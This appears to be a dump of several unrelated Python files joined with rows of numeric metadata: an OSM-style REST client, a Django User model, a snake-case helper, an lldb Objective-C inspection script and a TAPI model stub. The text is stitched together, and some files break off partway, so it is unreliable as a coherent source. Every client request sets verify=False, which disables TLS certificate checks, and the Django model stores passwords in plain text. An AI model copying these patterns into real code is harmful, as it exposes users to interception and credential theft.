nsi_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/netslice_instances_content".format( self._base_path) try: r = requests.post(_url, json=nsi_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_create(self, token, ns_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances_content".format(self._base_path) try: r = requests.post(_url, json=ns_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def pdu_create(self, token, pdu_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors".format(self._base_path) try: r = requests.post(_url, json=pdu_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_op_list(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_lcm_op_occs/?nsInstanceId={1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if 
r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsi_op_list(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/nsi_lcm_op_occs/?netsliceInstanceId={1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_op(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_lcm_op_occs/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_action(self, token, id, action_payload): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances/{1}/action".format( self._base_path, id) try: r = requests.post(_url, json=action_payload, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsi_delete(self, token, id, force=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if force: query_path = '?FORCE=true' _url = "{0}/nsilcm/v1/netslice_instances_content/{1}{2}".format( self._base_path, id, query_path) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def ns_delete(self, token, id, force=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if force: query_path = '?FORCE=true' _url = "{0}/nslcm/v1/ns_instances_content/{1}{2}".format( self._base_path, id, query_path) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def pdu_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) 
return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def nsi_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/netslice_instances/{1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances_content/{1}".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnf_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/vnfrs/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def pdu_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_alarm_create(self, token, id, alarm_payload): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/test/message/alarm_request".format(self._base_path) try: r = requests.post(_url, json=alarm_payload, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False # result['data'] = Util.json_loads_byteified(r.text) result['data'] = r.text return result def ns_metric_export(self, token, id, metric_payload): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/test/message/metric_request".format(self._base_path) try: r = requests.post(_url, json=metric_payload, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False # result['data'] = Util.json_loads_byteified(r.text) result['data'] = r.text return result def wim_list(self, token): 
result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vim_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def wim_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = r.text return result def vim_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = r.text return result def wim_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vim_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def wim_create(self, token, wim_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/wim_accounts".format(self._base_path) try: r = requests.post(_url, json=wim_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if 
r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vim_create(self, token, vim_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/vims".format(self._base_path) try: r = requests.post(_url, json=vim_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def sdn_list(self, token): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def sdn_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = r.text return result def sdn_get(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def sdn_create(self, token, sdn_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/sdns".format(self._base_path) try: r = requests.post(_url, json=sdn_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sc_get(self, token, id): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8sclusters/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def k8sc_list(self, token): result = {'error': True, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/k8sclusters".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: 
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sc_create(self, token, cluster_data):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/json", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8sclusters".format(self._base_path)
        try:
            r = requests.post(_url, json=cluster_data, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sc_update(self, token, id, cluster_data):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/json", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8sclusters/{1}".format(self._base_path, id)
        try:
            r = requests.patch(_url, json=cluster_data, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
        else:
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sc_delete(self, token, id):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/yaml", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8sclusters/{1}".format(self._base_path, id)
        try:
            r = requests.delete(_url, params=None, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
        else:
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sr_get(self, token, id):
        result = {'error': True, 'data': ''}
        headers = {"accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8srepos/{1}".format(self._base_path, id)
        try:
            r = requests.get(_url, params=None, verify=False, stream=True, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sr_list(self, token):
        result = {'error': True, 'data': ''}
        headers = {"accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8srepos".format(self._base_path)
        try:
            r = requests.get(_url, params=None, verify=False, stream=True, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sr_create(self, token, cluster_data):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/json", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8srepos".format(self._base_path)
        try:
            r = requests.post(_url, json=cluster_data, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sr_update(self, token, id, cluster_data):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/json", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8srepos/{1}".format(self._base_path, id)
        try:
            r = requests.patch(_url, json=cluster_data, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
        else:
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def k8sr_delete(self, token, id):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/yaml", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/k8srepos/{1}".format(self._base_path, id)
        try:
            r = requests.delete(_url, params=None, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
        else:
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def osmr_get(self, token, id):
        result = {'error': True, 'data': ''}
        headers = {"accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/osmrepos/{1}".format(self._base_path, id)
        try:
            r = requests.get(_url, params=None, verify=False, stream=True, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def osmr_list(self, token):
        result = {'error': True, 'data': ''}
        headers = {"accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/osmrepos".format(self._base_path)
        try:
            r = requests.get(_url, params=None, verify=False, stream=True, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def osmr_create(self, token, cluster_data):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/json", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/osmrepos".format(self._base_path)
        try:
            r = requests.post(_url, json=cluster_data, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def osmr_update(self, token, id, cluster_data):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/json", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/osmrepos/{1}".format(self._base_path, id)
        try:
            r = requests.patch(_url, json=cluster_data, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
        else:
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    def osmr_delete(self, token, id):
        result = {'error': True, 'data': ''}
        headers = {"Content-Type": "application/yaml", "accept": "application/json",
                   'Authorization': 'Bearer {}'.format(token['id'])}
        _url = "{0}/admin/v1/osmrepos/{1}".format(self._base_path, id)
        try:
            r = requests.delete(_url, params=None, verify=False, headers=headers)
        except Exception as e:
            log.exception(e)
            result['data'] = str(e)
            return result
        if r.status_code in (200, 201, 202, 204):
            result['error'] = False
        else:
            result['data'] = Util.json_loads_byteified(r.text)
        return result

    @staticmethod
    def md5(f):
        hash_md5 = hashlib.md5()
        for chunk in iter(lambda: f.read(1024), b""):
            hash_md5.update(chunk)
        return hash_md5.hexdigest()
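# Illustrative only (not part of the original file): every wrapper above follows
# the same contract -- callers always get {'error': bool, 'data': ...} back and
# never see an exception. A hedged usage sketch, assuming a configured client:
#
#     token = {'id': 'abc123'}                      # hypothetical bearer token dict
#     res = client.k8sc_create(token, {'name': 'cluster-1'})
#     if res['error']:
#         print('create failed:', res['data'])
#
# The md5 helper hashes any binary file-like object in 1 KiB chunks, so it also
# works for large uploads without loading them into memory:
#
#     with open('package.tar.gz', 'rb') as f:       # hypothetical file name
#         digest = Client.md5(f)                    # 'Client' stands in for the real class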
39.067079
114
0.52215
8,318
75,712
4.636211
0.037148
0.048491
0.042319
0.044809
0.925604
0.918032
0.911213
0.909242
0.906934
0.904859
0
0.026349
0.334306
75,712
1,937
115
39.087248
0.738795
0.011517
0
0.851327
0
0
0.157954
0.032441
0
0
0
0
0
1
0.056047
false
0
0.00649
0
0.173451
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7ba97e75c8387e583f023e9f936c7a01b8b64387
179
py
Python
product_hunt/account/models.py
xeroCBW/product_hunt
ef0f358609ed4c4063c037b2b0bb778b18e83bb8
[ "MIT" ]
null
null
null
product_hunt/account/models.py
xeroCBW/product_hunt
ef0f358609ed4c4063c037b2b0bb778b18e83bb8
[ "MIT" ]
null
null
null
product_hunt/account/models.py
xeroCBW/product_hunt
ef0f358609ed4c4063c037b2b0bb778b18e83bb8
[ "MIT" ]
null
null
null
from django.db import models


# Create your models here.
class User(models.Model):
    username = models.CharField(max_length=100)
    password = models.CharField(max_length=100)  # fixed typo: was "passwoed"
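# Editorial note (not in the original file): this model stores the password as
# plain text. Django's own auth app hashes credentials instead; a minimal sketch
# using its documented helpers:
#
#     from django.contrib.auth.hashers import make_password, check_password
#     hashed = make_password('s3cret')
#     assert check_password('s3cret', hashed)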
25.571429
47
0.759777
25
179
5.36
0.68
0.223881
0.268657
0.358209
0.402985
0
0
0
0
0
0
0.039216
0.145251
179
7
48
25.571429
0.836601
0.134078
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0.25
0.25
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
7
7bcafca62fcf3c3c4e5a84f7c7013bcf6b586343
216
py
Python
csr/snake_case.py
AlexJanse/python_csr2transmart
c01a76dfa6ecfa4248b274144092ccc6c31aab5a
[ "MIT" ]
3
2019-06-26T12:50:38.000Z
2020-02-16T17:19:45.000Z
csr/snake_case.py
AlexJanse/python_csr2transmart
c01a76dfa6ecfa4248b274144092ccc6c31aab5a
[ "MIT" ]
46
2019-08-15T12:25:58.000Z
2022-01-11T12:54:53.000Z
csr/snake_case.py
AlexJanse/python_csr2transmart
c01a76dfa6ecfa4248b274144092ccc6c31aab5a
[ "MIT" ]
3
2019-10-30T12:41:58.000Z
2021-11-08T13:06:32.000Z
import re

camel_case_to_snake_case_pattern = re.compile('(?!^)([A-Z]+)')


def camel_case_to_snake_case(camel_case_text: str) -> str:
    return camel_case_to_snake_case_pattern.sub(r'_\1', camel_case_text).lower()
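# Illustrative checks (not part of the source file). The (?!^) lookahead skips a
# leading capital, and [A-Z]+ keeps acronym runs together before one underscore:
#
#     assert camel_case_to_snake_case('DiagnosisDate') == 'diagnosis_date'
#     assert camel_case_to_snake_case('id') == 'id'              # no inner capitals: unchanged
#     assert camel_case_to_snake_case('HTTPCode') == 'h_ttpcode' # acronym run kept as one group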
27
80
0.75463
37
216
3.891892
0.486486
0.3125
0.229167
0.333333
0.513889
0.375
0
0
0
0
0
0.005102
0.092593
216
7
81
30.857143
0.729592
0
0
0
0
0
0.074074
0
0
0
0
0
0
1
0.25
false
0
0.25
0.25
0.75
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
7
c87701a43a537ade37b84aa8a660c375f05b4222
6,235
py
Python
src/xobjc.py
MustangYM/xia0LLDB
3c494dd86582f99966b5091af073c3c3033d733a
[ "Info-ZIP" ]
464
2018-10-04T06:57:54.000Z
2022-03-31T06:27:54.000Z
src/xobjc.py
MustangYM/xia0LLDB
3c494dd86582f99966b5091af073c3c3033d733a
[ "Info-ZIP" ]
31
2019-07-04T08:42:33.000Z
2022-03-21T20:49:57.000Z
src/xobjc.py
MustangYM/xia0LLDB
3c494dd86582f99966b5091af073c3c3033d733a
[ "Info-ZIP" ]
92
2019-07-03T02:50:55.000Z
2022-03-26T06:35:56.000Z
#! /usr/bin/env python3
# [figlet-style banner reading "xia0LLDB"; the original ASCII-art alignment was lost in extraction]

import lldb
import os
import shlex
import optparse
import json
import re
import utils


def __lldb_init_module(debugger, internal_dict):
    debugger.HandleCommand('command script add -f xobjc.ivars ivars -h "ivars made by xia0"')
    debugger.HandleCommand('command script add -f xobjc.methods methods -h "methods made by xia0"')
    debugger.HandleCommand('command script add -f xobjc.xivars xivars -h "ivars made by xia0 for macOS or ivars not work"')
    debugger.HandleCommand('command script add -f xobjc.xmethods xmethods -h "methods made by xia0 for macOS or methods not work"')


def ivars(debugger, command, exe_ctx, result, internal_dict):
    def generate_option_parser():
        usage = "usage: xmethods"
        parser = optparse.OptionParser(usage=usage, prog="lookup")
        parser.add_option("-n", "--name",
                          action="store",
                          default=None,
                          dest="name",
                          help="set the class name for methods")
        return parser

    command_args = shlex.split(command, posix=False)
    parser = generate_option_parser()
    try:
        (options, args) = parser.parse_args(command_args)
    except:
        result.SetError(parser.usage)
        return

    _ = exe_ctx.target
    _ = exe_ctx.thread

    if options.name:
        clzname = options.name
        clzname = re.search("^\"(.*)\"$", clzname).group(1)
        utils.ILOG("will get methods for class:\"{}\"".format(clzname))
        code = '''
        Class clz = objc_getClass(\"{}\");
        id ret = [clz _ivarDescription];
        ret
        '''.format(clzname)
        ret = utils.exe_script(debugger, code)
        result.AppendMessage(ret)
        return result

    clz = args[0]
    code = '''
    id ret = [{} _ivarDescription];
    ret
    '''.format(clz)
    ret = utils.exe_script(debugger, code)
    result.AppendMessage(ret)
    return result


def methods(debugger, command, exe_ctx, result, internal_dict):
    def generate_option_parser():
        usage = "usage: xmethods"
        parser = optparse.OptionParser(usage=usage, prog="lookup")
        parser.add_option("-n", "--name",
                          action="store",
                          default=None,
                          dest="name",
                          help="set the class name for methods")
        return parser

    command_args = shlex.split(command, posix=False)
    parser = generate_option_parser()
    try:
        (options, args) = parser.parse_args(command_args)
    except:
        result.SetError(parser.usage)
        return

    _ = exe_ctx.target
    _ = exe_ctx.thread

    if options.name:
        clzname = options.name
        try:
            clzname = re.search("^\"(.*)\"$", clzname).group(1)
        except:
            utils.ELOG("input format error! need \"class name\"")
            return
        utils.ILOG("will get methods for class:\"{}\"".format(clzname))
        code = '''
        Class clz = objc_getClass(\"{}\");
        id ret = [clz _shortMethodDescription];
        ret
        '''.format(clzname)
        ret = utils.exe_script(debugger, code)
        result.AppendMessage(ret)
        return result

    clz = args[0]
    code = '''
    id ret = [{} _shortMethodDescription];
    ret
    '''.format(clz)
    ret = utils.exe_script(debugger, code)
    result.AppendMessage(ret)
    return result


def xivars(debugger, command, exe_ctx, result, internal_dict):
    def generate_option_parser():
        usage = "usage: xivars"
        parser = optparse.OptionParser(usage=usage, prog="lookup")
        parser.add_option("-a", "--address",
                          action="store",
                          default=None,
                          dest="address",
                          help="set a breakpoint at absolute address")
        return parser

    command_args = shlex.split(command, posix=False)
    parser = generate_option_parser()
    try:
        (options, args) = parser.parse_args(command_args)
    except:
        result.SetError(parser.usage)
        return

    _ = exe_ctx.target
    _ = exe_ctx.thread

    result.AppendMessage("command is still developing. please wait...\n")
    return parser


def xmethods(debugger, command, exe_ctx, result, internal_dict):
    def generate_option_parser():
        usage = "usage: xmethods"
        parser = optparse.OptionParser(usage=usage, prog="lookup")
        parser.add_option("-a", "--address",
                          action="store",
                          default=None,
                          dest="address",
                          help="set a breakpoint at absolute address")
        return parser

    command_args = shlex.split(command, posix=False)
    parser = generate_option_parser()
    try:
        (options, args) = parser.parse_args(command_args)
    except:
        result.SetError(parser.usage)
        return

    _ = exe_ctx.target
    _ = exe_ctx.thread

    result.AppendMessage("command is still developing. please wait...\n")
    return parser
32.989418
165
0.557338
552
6,235
5.293478
0.186594
0.024641
0.054757
0.046543
0.874059
0.864476
0.831622
0.80219
0.80219
0.80219
0
0.002156
0.330393
6,235
189
166
32.989418
0.697725
0.147554
0
0.838235
0
0.014706
0.22017
0.017719
0
0
0
0
0
1
0.066176
false
0
0.051471
0
0.227941
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c8a77a3bfab963036b1730a018da62cab289cf35
10,686
py
Python
RI/flask_server/tapi_server/models/tapi_photonic_media_total_power_threshold_pac.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
57
2018-04-09T08:56:18.000Z
2022-03-23T08:31:06.000Z
RI/flask_server/tapi_server/models/tapi_photonic_media_total_power_threshold_pac.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
143
2016-06-08T04:09:54.000Z
2018-02-23T10:45:59.000Z
RI/flask_server/tapi_server/models/tapi_photonic_media_total_power_threshold_pac.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
64
2018-03-07T07:55:17.000Z
2022-03-28T07:14:28.000Z
# coding: utf-8

from __future__ import absolute_import
from datetime import date, datetime  # noqa: F401

from typing import List, Dict  # noqa: F401

from tapi_server.models.base_model_ import Model
from tapi_server import util


class TapiPhotonicMediaTotalPowerThresholdPac(Model):
    """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).

    Do not edit the class manually.
    """

